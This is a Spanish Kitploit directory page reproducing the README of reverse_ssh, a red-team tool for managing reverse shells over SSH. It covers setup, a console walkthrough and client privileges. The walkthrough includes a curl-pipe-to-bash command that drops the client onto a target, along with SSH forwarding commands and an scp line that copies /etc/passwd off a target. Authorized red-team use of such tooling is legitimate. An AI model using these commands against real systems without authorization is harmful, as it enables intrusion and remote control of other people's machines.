Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
reverse_ssh — Herramienta de gestión de shell inversa basada en SSH con soporte nativo de SCP/SFTP, múltiples protocolos de transporte, generación de DLL para Windows y ejecución sin archivos para operaciones de red team. | Kitploit
Herramientas/GitHubGitHub/nhas/reverse_ssh
ShellcodeGeneración de Shellcode
GitHubnhas/reverse_ssh

reverse_ssh

Herramienta de gestión de shell inversa basada en SSH con soporte nativo de SCP/SFTP, múltiples protocolos de transporte, generación de DLL para Windows y ejecución sin archivos para operaciones de red team.

Ver Repositorio
1.4k18433hace 22 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Reverse SSH

icon
(Crédito artístico a https://www.instagram.com/smart.hedgehog.art/)

¿Quieres usar SSH para shells reversas? Ahora puedes.

  • Administra y conéctate a shells reversas con la sintaxis nativa de SSH
  • Reenvío dinámico, local y remoto
  • Implementaciones nativas de SCP y SFTP para recuperar archivos de tus objetivos
  • Shell completo de Windows
  • Múltiples transportes de red, como http, websockets, tls y más
  • Autenticación mutua de cliente y servidor para crear canales de control de alta confianza ¡Y más!```text +----------------+ +---------+ | | | | | | +---------+ RSSH | | Reverse | | | Client | | SSH server | | | | | | | +---------+ +---------+ | | | | | | | | | Human | SSH | | SSH | +---------+ | Client +-------->+ <-----------------+ | | | | | | | RSSH | +---------+ | | | | Client | | | | | | | | | +---------+ | | | | | | +----------------+ | +---------+ | | | | | RSSH | +---------+ Client | | | +---------+
https://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1

- [SSH inverso](#reverse-ssh)
  - [TL;DR](#tldr)
    - [Configuración](#setup)
    - [Uso básico](#basic-usage)
  - [Patrocinadores](#sponsors)
    - [Individuos](#individuals)
    - [Empresas](#companies)
  - [Características interesantes](#fancy-features)
    - [Privilegios](#privileges)
    - [Conexión automática de retorno](#automatic-connect-back)
    - [Descarga de shell inversa (generación de cliente y servidor HTTP incorporado)](#reverse-shell-download-client-generation-and-in-built-http-server)
    - [Transportes alternativos (HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)
    - [Autocompletado de Bash](#bash-autocomplete)
    - [Generación de DLL de Windows](#windows-dll-generation)
    - [Subsistemas SSH](#ssh-subsystems)
      - [Todos](#all)
      - [Linux](#linux)
      - [Windows](#windows)
    - [Integración con servicios de Windows](#windows-service-integration)
    - [Soporte completo de shell de Windows](#full-windows-shell-support)
    - [Webhooks](#webhooks)
    - [Tun (VPN)](#tun-vpn)
    - [Ejecución sin archivos (Los clientes admiten descargar dinámicamente ejecutables para ejecutar como shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)
      - [Esquemas de URI admitidos](#supported-uri-schemes)
- [Ayuda](#help)
  - [Windows](#windows-help)
    - [SFTP](#windows-and-sftp)
    - [Errores de generación de sesión (0xc0000142)](#session-spawn-errors-0xc0000142)
  - [Servidor iniciado con `--insecure` aún tiene `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)
  - [Primer plano vs Segundo plano](#foreground-vs-background)
- [Donaciones, soporte o retribución](#donations-support-or-giving-back)

## TL;DR

### Configuración

Se recomienda la versión Docker, ya que incluye la versión correcta de Golang y un compilador cruzado para Windows.```sh
# Start the server
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh

o docker compose:```yaml services: reversessh: image: reversessh/reverse_ssh ports: - "3232:2222" environment: - EXTERNAL_ADDRESS=<your.rssh.server.internal>:3232 - RSSH_CONSOLE_LABEL=c2.label - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY} volumes: - ./data:/data

### Uso Básico```sh
# Connect to the server console
ssh your.rssh.server.internal -p 3232


# List all server console commands
catcher$ help

# Build a new client and host it on the in-built webserver
catcher$ link
http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25


# curl or wget this binary to a target system then execute it,
curl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh |  bash

# then we can then list what clients are connected
catcher$ ls
                                 Targets
+------------------------------------------+-----------------------------------+
| IDs                                      | Version                           |
+------------------------------------------+-----------------------------------+
| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |
| fe6c52029e37185e4c7d512edd67a6c7694e2995 |                                   |
| dummy.machine                            |                                   |
| 192.168.0.11:34542                       |                                   |
+------------------------------------------+-----------------------------------+

Todos los comandos admiten la opción -h para obtener ayuda.

Luego, los comandos típicos de ssh funcionan, solo especifica tu servidor rssh como host de salto.```sh

Connect to full shell

ssh -J your.rssh.server.internal:3232 dummy.machine

Start remote forward

ssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine

Start dynamic forward

ssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine

SCP

scp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .

## Patrocinadores

Un enorme agradecimiento a las siguientes personas por donar al proyecto RSSH y hacer posible todo esto!

### Individuos
[chikamobina](https://github.com/chikamobina) por sus generosas donaciones!  
[wrighterase (ctrlzero)](https://github.com/wrighterase) por sus pull requests y donación!

### Empresas

[Carapace](https://carapace.nz/) es una consultora de seguridad con sede en Nueva Zelanda con un equipo extremadamente talentoso!  
[<img src="https://assets.kitploit.com/production/public/readmes/5627/b077b138b5108d69a3bcb10eea9d5f195914c9fb4653689923b3a10a1ee38a64.png">](https://carapace.nz/)


## Funciones Fantásticas


### Privilegios
El servidor RSSH admite privilegios de usuario muy básicos, donde los usuarios que se encuentran en la carpeta `data-directory`/`keys` (especificada por `--datadir`) p. ej. `data-directory/keys/jim` serán asignados como un "usuario" solo capaz de ver clientes que sean públicos (que se encuentran en el archivo authorized_controllee_keys sin una etiqueta `owners`, o con una etiqueta `owners` vacía) o específicamente asignados a ellos, p. ej. `owners="jim"`.

Esto se puede cambiar en tiempo de ejecución mediante un usuario que comparta acceso a un cliente que posee con el comando `access`, o un administrador del servidor. De forma predeterminada, cualquier clave pública que se encuentre en el archivo `authorized_keys` será marcada como administrador para mantener la compatibilidad hacia atrás.
Cualquier cambio realizado por el comando `access` no persistirá después de reiniciar el servidor, y esto requerirá editar el archivo `authorized_controllee_keys` para ese cliente específico.

### Conexión automática de retorno
Descargar herramienta